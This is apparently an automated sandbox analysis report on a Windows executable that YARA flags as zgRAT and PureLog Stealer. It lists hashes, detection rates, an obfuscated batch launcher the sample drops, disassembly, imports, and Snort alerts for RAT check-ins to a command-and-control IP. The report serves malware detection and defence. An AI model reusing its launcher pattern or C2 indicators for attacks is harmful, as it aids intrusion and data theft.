SHA-512:	0DD14259265F466576FB8DF29E9ABB4F5DB97EA8A48A8F6AEE5F2C75AE7A0EEBB96EC828C755B901B5DAB79A9B3ADC1F5151D0C7DD407F36ECB6C7AA8D2868A7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\fontrefcrt\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\fontrefcrt\WmiPrvSE.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83% Antivirus: Virustotal, Detection: 74%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....e............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H..............................l........................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{c...9....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0..)....... ........8........E........N...)...............8....8.... ....~....{{...9....& ....8.......... ....~....{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8_...r...ps....z~....:.... ....~....{....95...& ....8.......~....(P.

C:\fontrefcrt\YPm3Ri0zuGSw0d5cA9MOsCVgRsbtCEjXWkwqUVDQU6Ex.bat

Download File

Process:	C:\Users\user\Desktop\yX8787W7de.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	85
Entropy (8bit):	5.04335406627353
Encrypted:	false
SSDEEP:	3:xQuQPFPX7iDknsnaXsoWMlK2GT3wxCVl:2PFzZsna8LMQhjwxCVl
MD5:	E2BB5D299A1F5E700AFF351E4D6BDC87
SHA1:	F82EE16A655FBE451B0ABF7D498EE6E9633B79F5
SHA-256:	70993080AF47510BDC510F02419C9BDBC5FB9D68FA7EEDEFA084AEFE65D4309D
SHA-512:	9FA28DB03850079F5E19B5C20BECE20F3B9AD7C6E3DF884AE8CE22A7D09F5172793D1CACD83683990CB381F581676684F7B85C75E44E2A7A9E7CECEF26BA3B83
Malicious:	false
Preview:	%qjfqhidAOQdxL%%iajrZV%..%fAWNoUpgxcEpqKm%"C:\fontrefcrt/MsintoRefcommonsvc.exe"%hMe%

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.825475482457549
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXkRMpBPi5HuAHKvp77yXKvj:Vx993DEUyp10HPyos
MD5:	C0003C552ADF56A2B1112FAB91F9092F
SHA1:	08BDC7F8120574525FE8F7A8A5D028C463F15106
SHA-256:	D5F615C61906CA069DFFE1C3FA25566B3846AE06B89C5019C15E33D0B33E635D
SHA-512:	1EF9DA747299C4D18555F391352AFB1EF53BAF178369473588C13CCEB1352F5340B9A2C49C305758890D9AF6379689A898EA60E2387C32980F430E3ABC791108
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 26/04/2024 06:35:30..06:35:30, error: 0x80072746.06:35:35, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.385553816659344
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	yX8787W7de.exe
File size:	2'010'836 bytes
MD5:	10f54a1a68bce057dc9abbc2851a6235
SHA1:	aa70b6be5f6e35655d0a5e25c450b47f4a23ffd0
SHA256:	d0be212a60bf7479492be23497cf0e933b8c6fda4e68b0d9724c7dc18e30fa37
SHA512:	27f969892fa902c262bbe0e06406be3590f5d3184a619d7f0d4d09f9850ea3ae2a17df9cd8ed40ddaa7a4eb660e214ff22a65d48796a86fc34f60ec7e402f9a8
SSDEEP:	24576:2TbBv5rUyXVJscKze7Cuj+1u6YVz+AOJCxYdSxb5MNi4mJy57SPw3eKS+JE204XB:IBJq6n+0YdQ+iylSI3DE2o7OOW
TLSH:	5F95AE06B9D14E73C2B62B3146A7053D86A1D7326612EF4F365F24D6A917BF08A321F3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007FF45082319Bh
jmp 00007FF450822AADh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FF4508158F7h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007FF450825F3Fh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FF450822C3Ch
push 0000000Ch
push esi
call 00007FF4508221F9h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FF450815872h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FF4508259F9h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FF450822BB8h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FF4508259DCh
int3
jmp 00007FF450827477h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0xdff8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x72000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0xdff8	0xe000	ba08fbcd0ed7d9e6a268d75148d9914b	False	0.6373639787946429	data	6.638661032196024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x72000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x65198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x66cb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x67558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x68400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x68868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x69910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6beb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x70588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x70358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x70498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x70228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6fef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6fc98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x70f68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x71150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x71320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x714d8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x71620	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x71a90	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x71bf8	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x71d50	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x71e60	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x71f20	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6fc30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x70810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/26/24-05:18:06.649964	TCP	2048095	ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)	49740	80	192.168.2.4	104.21.16.102
04/26/24-05:17:55.506360	TCP	2048095	ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)	49738	80	192.168.2.4	104.21.16.102
04/26/24-05:18:16.044779	TCP	2048095	ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)	49742	80	192.168.2.4	104.21.16.102
04/26/24-05:18:58.981677	TCP	2048095	ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)	49746	80	192.168.2.4	104.21.16.102
04/26/24-05:18:22.668854	TCP	2048095	ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)	49744	80	192.168.2.4	104.21.16.102
04/26/24-05:18:13.157896	TCP	2048095	ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)	49741	80	192.168.2.4	104.21.16.102
04/26/24-05:17:25.838542	TCP	2048095	ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)	49736	80	192.168.2.4	104.21.16.102
04/26/24-05:18:04.927388	TCP	2048095	ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)	49739	80	192.168.2.4	104.21.16.102
04/26/24-05:18:17.813793	TCP	2048095	ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)	49743	80	192.168.2.4	104.21.16.102
04/26/24-05:18:49.422994	TCP	2048095	ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)	49745	80	192.168.2.4	104.21.16.102

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 05:17:25.691147089 CEST	49736	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:17:25.837816954 CEST	80	49736	104.21.16.102	192.168.2.4
Apr 26, 2024 05:17:25.837912083 CEST	49736	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:17:25.838541985 CEST	49736	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:17:25.986157894 CEST	80	49736	104.21.16.102	192.168.2.4
Apr 26, 2024 05:17:25.986197948 CEST	80	49736	104.21.16.102	192.168.2.4
Apr 26, 2024 05:17:25.987226009 CEST	49736	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:17:26.173844099 CEST	80	49736	104.21.16.102	192.168.2.4
Apr 26, 2024 05:17:26.432651997 CEST	80	49736	104.21.16.102	192.168.2.4
Apr 26, 2024 05:17:26.432676077 CEST	80	49736	104.21.16.102	192.168.2.4
Apr 26, 2024 05:17:26.432715893 CEST	80	49736	104.21.16.102	192.168.2.4
Apr 26, 2024 05:17:26.432739973 CEST	49736	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:17:26.643037081 CEST	49736	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:17:27.318522930 CEST	49736	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:17:55.359420061 CEST	49738	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:17:55.506002903 CEST	80	49738	104.21.16.102	192.168.2.4
Apr 26, 2024 05:17:55.506094933 CEST	49738	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:17:55.506360054 CEST	49738	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:17:55.652707100 CEST	80	49738	104.21.16.102	192.168.2.4
Apr 26, 2024 05:17:55.652987957 CEST	80	49738	104.21.16.102	192.168.2.4
Apr 26, 2024 05:17:55.653254032 CEST	49738	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:17:55.839888096 CEST	80	49738	104.21.16.102	192.168.2.4
Apr 26, 2024 05:17:56.090440035 CEST	80	49738	104.21.16.102	192.168.2.4
Apr 26, 2024 05:17:56.090498924 CEST	80	49738	104.21.16.102	192.168.2.4
Apr 26, 2024 05:17:56.090545893 CEST	80	49738	104.21.16.102	192.168.2.4
Apr 26, 2024 05:17:56.090574980 CEST	49738	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:17:56.143035889 CEST	49738	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:17:56.166538000 CEST	49738	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:04.780117035 CEST	49739	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:04.926951885 CEST	80	49739	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:04.927148104 CEST	49739	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:04.927387953 CEST	49739	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:05.088704109 CEST	80	49739	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:05.089287996 CEST	80	49739	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:05.089550972 CEST	49739	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:05.277949095 CEST	80	49739	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:05.526119947 CEST	80	49739	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:05.526145935 CEST	80	49739	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:05.526163101 CEST	80	49739	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:05.526349068 CEST	49739	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:05.651376963 CEST	49739	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:06.501460075 CEST	49740	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:06.649185896 CEST	80	49740	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:06.649322033 CEST	49740	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:06.649964094 CEST	49740	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:06.797110081 CEST	80	49740	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:06.797492027 CEST	80	49740	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:06.797735929 CEST	49740	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:06.986639977 CEST	80	49740	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:07.243365049 CEST	80	49740	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:07.243408918 CEST	80	49740	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:07.243477106 CEST	80	49740	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:07.243664026 CEST	49740	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:07.317538023 CEST	49740	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:13.008882999 CEST	49741	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:13.157269955 CEST	80	49741	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:13.157589912 CEST	49741	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:13.157896042 CEST	49741	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:13.305221081 CEST	80	49741	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:13.305624962 CEST	80	49741	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:13.305860043 CEST	49741	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:13.493345976 CEST	80	49741	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:13.744168043 CEST	80	49741	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:13.744297981 CEST	80	49741	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:13.744333982 CEST	80	49741	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:13.744364977 CEST	49741	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:13.799299002 CEST	49741	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:13.840073109 CEST	49741	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:15.896754980 CEST	49742	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:16.044336081 CEST	80	49742	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:16.044459105 CEST	49742	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:16.044779062 CEST	49742	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:16.193372011 CEST	80	49742	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:16.193636894 CEST	80	49742	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:16.201302052 CEST	49742	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:16.389807940 CEST	80	49742	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:16.641925097 CEST	80	49742	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:16.641968966 CEST	80	49742	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:16.642004013 CEST	80	49742	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:16.642029047 CEST	49742	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:16.690035105 CEST	49742	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:16.742822886 CEST	49742	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:17.664895058 CEST	49743	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:17.813405037 CEST	80	49743	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:17.813497066 CEST	49743	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:17.813792944 CEST	49743	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:17.961172104 CEST	80	49743	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:17.961420059 CEST	80	49743	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:17.961812019 CEST	49743	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:18.149270058 CEST	80	49743	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:18.402940035 CEST	80	49743	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:18.402992964 CEST	80	49743	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:18.403065920 CEST	49743	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:18.403137922 CEST	80	49743	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:18.455569983 CEST	49743	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:18.494589090 CEST	49743	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:22.520241976 CEST	49744	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:22.668346882 CEST	80	49744	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:22.668473005 CEST	49744	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:22.668853998 CEST	49744	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:22.816288948 CEST	80	49744	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:22.816654921 CEST	80	49744	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:22.816981077 CEST	49744	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:23.005248070 CEST	80	49744	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:23.263287067 CEST	80	49744	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:23.263341904 CEST	80	49744	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:23.263380051 CEST	80	49744	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:23.263417006 CEST	49744	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:23.370745897 CEST	49744	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:49.273571968 CEST	49745	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:49.422142982 CEST	80	49745	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:49.422301054 CEST	49745	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:49.422993898 CEST	49745	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:49.570924044 CEST	80	49745	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:49.571254015 CEST	80	49745	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:49.571814060 CEST	49745	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:49.760699034 CEST	80	49745	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:50.016786098 CEST	80	49745	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:50.016845942 CEST	80	49745	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:50.016904116 CEST	80	49745	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:50.016933918 CEST	49745	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:50.064987898 CEST	49745	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:50.120928049 CEST	49745	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:58.828448057 CEST	49746	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:58.976686954 CEST	80	49746	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:58.976835966 CEST	49746	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:58.981677055 CEST	49746	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:59.128762007 CEST	80	49746	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:59.128940105 CEST	80	49746	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:59.129264116 CEST	49746	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:59.316768885 CEST	80	49746	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:59.573710918 CEST	80	49746	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:59.573862076 CEST	80	49746	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:59.573873997 CEST	80	49746	104.21.16.102	192.168.2.4
Apr 26, 2024 05:18:59.574032068 CEST	49746	80	192.168.2.4	104.21.16.102
Apr 26, 2024 05:18:59.660712004 CEST	49746	80	192.168.2.4	104.21.16.102

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 05:17:25.243611097 CEST	65294	53	192.168.2.4	1.1.1.1
Apr 26, 2024 05:17:25.684423923 CEST	53	65294	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
